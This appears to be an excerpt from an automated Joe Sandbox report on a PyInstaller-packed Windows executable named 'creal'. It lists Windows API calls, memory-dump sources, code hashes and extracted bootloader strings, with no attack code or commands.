                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                • Opcode ID: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                                                                                                                                                                • Instruction ID: 12bb18dd9536e7a3443c472f342c4abcdbba80539f183eaea4a318b95cee5972
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD510673F242128AFB24DF64D9556BE2BA1BB01B68F500176DE1E92AF5DF3CA402D740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2780335769-0
APIs
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 1452418845-0
APIs
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
APIs
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
Strings
Similarity
• API ID: CreateDirectoryMessage
• String ID: Security descriptor is not initialized!
• API String ID: 73271072-986317556
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67A615A11), ref: 00007FF67A615B2F
                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67A615A11), ref: 00007FF67A615B45
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                • Opcode ID: bb6c187991dbf4b757a25256d017e3a2e1c80456cbfa3cced84e316cd19fd1ad
                                                                                                                                                                                                                • Instruction ID: 9d184ce73b0270fcb6d397e317a5ea98e93c0887d619402f80f6d74b9d08128f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb6c187991dbf4b757a25256d017e3a2e1c80456cbfa3cced84e316cd19fd1ad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D211517362C64281EB548B15E45117FF7A0EB84B71F501275E69EC59F8EF2CD054EB10
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67A618039), ref: 00007FF67A6181DF
                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67A618039), ref: 00007FF67A6181F5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                • Opcode ID: dfa1188102ceb568b3fc50e3ccebbeec8210bce0ede501d744e2ebb6e9f34169
                                                                                                                                                                                                                • Instruction ID: 6544e0e6b7c644437fb578755a882529f875c13fc970405cd990774ffef72a15
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfa1188102ceb568b3fc50e3ccebbeec8210bce0ede501d744e2ebb6e9f34169
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68017C2352C652C2E7509F14E40127BB7A0FB85FA2F600275EAAD859E8DF3CD450EB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B022
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B02C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                • Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                                                                                                                                                • Instruction ID: 3ecb0ead6d2df735ca5381dfdc0ea46408671b8baef2151728c32fdbe52b3dec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7E08C52F2820282FF19ABB6D84507719919F98F02F4084B4C92DC72B6EE3CA8856650
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2018770650-0
                                                                                                                                                                                                                • Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                                                                                                                                                                • Instruction ID: b4c9641be177cb763c105fc56b6b2059757f0e7631bd29470974fc083671cfc7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6D01212F3D60381E6557B769C4507F15D06F58F36F5006B0C52DC21F1DF3CA0452512
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 377330604-0
                                                                                                                                                                                                                • Opcode ID: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                                                                                                                                                                • Instruction ID: cd0f81349368b3b3138e8f94d42aaf1e59dba12c3568d0d9ef8da0c6a86b27af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53D01212F3D60386E6546B75AC8507B15905F48F34F5006F0C12EC01F0DE2CB4853D51
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF67A61B099,?,?,00000000,00007FF67A61B14E), ref: 00007FF67A61B28A
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF67A61B099,?,?,00000000,00007FF67A61B14E), ref: 00007FF67A61B294
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608C1A
                                                                                                                                                                                                                • _findclose.LIBCMT ref: 00007FF67A607FA9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2772937645-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 377330604-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF67A61BAA6,?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02), ref: 00007FF67A61F2AD
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF67A610E24,?,?,?,00007FF67A612336,?,?,?,?,?,00007FF67A613929), ref: 00007FF67A61DCFA
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                                                • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get 
address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                • API String ID: 190572456-4266016200
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                                • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00007FF67A602A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A608597
                                                                                                                                                                                                                • FormatMessageW.KERNEL32 ref: 00007FF67A6085C6
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32 ref: 00007FF67A60861C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                • Opcode ID: 524e51f0921ab816a8e947fcf7c0d96cffb913f518e40e1861c067ce2dfcbe45
                                                                                                                                                                                                                • Instruction ID: 5c2af25f0d38f0d82fcce9281658111bb999b6d26469fdeb5cae1f8acb5c4641
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 524e51f0921ab816a8e947fcf7c0d96cffb913f518e40e1861c067ce2dfcbe45
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0B19123B2969681EA64DF32D8046BB6392EB54FE4F444171EE5D87BE5DE3CE441E300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                                                                                                                                                                • Instruction ID: 5c52561a126f9bbe748b46611f8b8c2bc86a8046c9f2379e42e7c853d56f7016
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B113026B25F0589EB00CF70E8542BA33A4FB19B58F440E31DA6D867B4DF7CD1A59390
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
